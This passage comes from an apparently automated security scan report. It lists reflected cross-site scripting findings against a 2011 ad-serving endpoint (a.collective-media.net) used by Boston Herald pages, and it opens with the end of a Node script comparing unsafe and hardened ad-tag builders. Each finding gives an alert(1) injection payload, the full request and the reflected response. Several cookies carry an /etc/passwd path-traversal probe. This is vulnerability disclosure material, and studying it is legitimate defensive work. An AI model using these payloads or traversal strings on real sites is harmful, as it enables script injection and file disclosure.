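  console.log('safe placement:  ', probeBreaksOut(buildAdTagSafe, 'placement'));
}
```

Run it with node; the unsafe builder reports breakout: true for both the placement segment and the sz value, while the hardened builder rejects the probe before anything is emitted. The allow-list is the fix that matters; JSON.stringify is defence in depth, so that a future component that is allowed to contain a quote still cannot terminate the literal.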

4.11. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac83b'-alert(1)-'4a7cc732c20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_newsac83b'-alert(1)-'4a7cc732c20;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:47 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:47 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_newsac83b'-alert(1)-'4a7cc732c20;sz=300x250;net=q1;ord=2118037356?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.12. http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fa92'-alert(1)-'ab795776af3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356?&7fa92'-alert(1)-'ab795776af3=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:44 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?&7fa92'-alert(1)-'ab795776af3=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.13. http://a.collective-media.net/adj/q1.bosherald/be_news [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5634a'-alert(1)-'72ece40b226 was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that in the request below the probe is appended after the trailing ? of the URL rather than substituted for the 300x250 value of sz; the server reflects the whole matrix-parameter tail of the path, so the label "sz parameter" describes how the scanner parsed the URL, not where the payload sits.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356?5634a'-alert(1)-'72ece40b226 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:43 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1ddf45fe985559f7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?5634a'-alert(1)-'72ece40b226;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.14. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a879'-alert(1)-'64a75099063 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald5a879'-alert(1)-'64a75099063/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:14 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:14 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald5a879'-alert(1)-'64a75099063/ent_fr;sz=300x250;net=q1;ord=1813138297?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.15. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8840e'-alert(1)-'d174ab07fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent_fr8840e'-alert(1)-'d174ab07fa0;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:20 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:20 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr8840e'-alert(1)-'d174ab07fa0;sz=300x250;net=q1;ord=1813138297?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.16. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b65f'-alert(1)-'bf030976c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297?&2b65f'-alert(1)-'bf030976c6a=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 457
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:08 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:08 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?&2b65f'-alert(1)-'bf030976c6a=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.17. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cedc7'-alert(1)-'a9dad4ab33d was submitted in the sz parameter. This input was echoed unmodified in the application's response. As in 4.13, the probe in the request below is appended after the trailing ? of the URL rather than replacing the 300x250 value; the whole matrix-parameter tail is reflected.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297?cedc7'-alert(1)-'a9dad4ab33d HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:01 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d2fd5b0e622cff9d7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:01 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?cedc7'-alert(1)-'a9dad4ab33d;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.18. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2596'-alert(1)-'065299ab6fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosheraldf2596'-alert(1)-'065299ab6fa/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosheraldf2596'-alert(1)-'065299ab6fa/news;sz=728x90;net=q1;ord=354527464?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.19. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b4c'-alert(1)-'8f565e9fc2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/newsf3b4c'-alert(1)-'8f565e9fc2f;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/newsf3b4c'-alert(1)-'8f565e9fc2f;sz=728x90;net=q1;ord=354527464?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.20. http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86cf3'-alert(1)-'c4fb3c8bde4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464?&86cf3'-alert(1)-'c4fb3c8bde4=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:44 GMT
Connection: close
Set-Cookie: dc=sea-dc%22; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?&86cf3'-alert(1)-'c4fb3c8bde4=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.21. http://a.collective-media.net/adj/q1.bosherald/news [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1595'-alert(1)-'d3ce0ff70fa was submitted in the sz parameter. This input was echoed unmodified in the application's response. As in 4.13, the probe in the request below is appended after the trailing ? of the URL rather than replacing the 728x90 value; the whole matrix-parameter tail is reflected.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464?c1595'-alert(1)-'d3ce0ff70fa HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:43 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1ddf45fe985559f7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
